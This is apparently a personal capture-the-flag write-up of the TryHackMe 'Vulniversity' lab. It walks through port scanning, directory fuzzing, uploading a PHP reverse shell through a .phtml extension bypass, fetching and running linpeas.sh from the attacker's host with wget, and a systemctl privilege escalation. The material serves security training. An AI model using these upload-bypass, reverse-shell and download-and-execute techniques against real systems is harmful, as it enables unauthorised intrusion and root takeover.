THM Vulniversity

Introduction

So according to a post I saw on Medium, this is one of a series of OSCP like rooms on THM. I’ll give it a go.

Open Ports

I’ve got ports 21 (FTP), 22 (SSH), 139 + 445 (SMB), so maybe this is a Windows box. I also have 3128 which may be for the Squid Caching Web Proxy (Wikipedia) and 3333 which is a non-standard port. I’ll have to ask nmap for more details.

Scan Detail

nmap says we’ve got vsftpd 3.0.3 on port 21, OpenSSH 7.2p2 on port 22, SMB on 139+445, plus:

3128/tcp open  http-proxy  syn-ack ttl 63 Squid http proxy 3.5.12, and
3333/tcp open  http        syn-ack ttl 63 Apache httpd 2.4.18 (Ubuntu)

So actually this is a Linux box with a webserver on port 3333.

The scan also says the version of Squid has a 10 out of 10 CVE, so I’m going to want to check that out.

Webserver

Visiting the webserver reveals a front page for a University, many of the links don’t work though. There is no robots.txt, but /images and /js both offer directory listings. Let’s fuzz:

root@kali:/opt/tryhackme/vulniversity# wfuzz --hc 404 -u http://10.10.14.79:3333/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

The fuzzing turned up a page called /internal, which appears to offer some sort of file upload. The index page for this subdirectory is index.php, so the server is running PHP. Fuzzing inside the directory finds http://10.10.14.79:3333/internal/uploads/, where our files will appear. Let’s try a PHP reverse shell.

Shell

Using the .phtml extension I could upload the pentestmonkey PHP reverse shell and connect as www-data. I copied over linpeas.sh to /dev/shm and ran it.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@vulnuniversity:/dev/shm$ wget http://10.9.10.123:8000/linpeas.sh
wget http://10.9.10.123:8000/linpeas.sh
--2020-06-19 05:41:52--  http://10.9.10.123:8000/linpeas.sh
Connecting to 10.9.10.123:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 161179 (157K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 157.40K   176KB/s    in 0.9s    

2020-06-19 05:41:54 (176 KB/s) - 'linpeas.sh' saved [161179/161179]

www-data@vulnuniversity:/dev/shm$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@vulnuniversity:/dev/shm$ ./linpeas.sh

Linpeas showed a probable privesc via SystemCTL, which can be found on GTFOBins, and sure enough this led to root.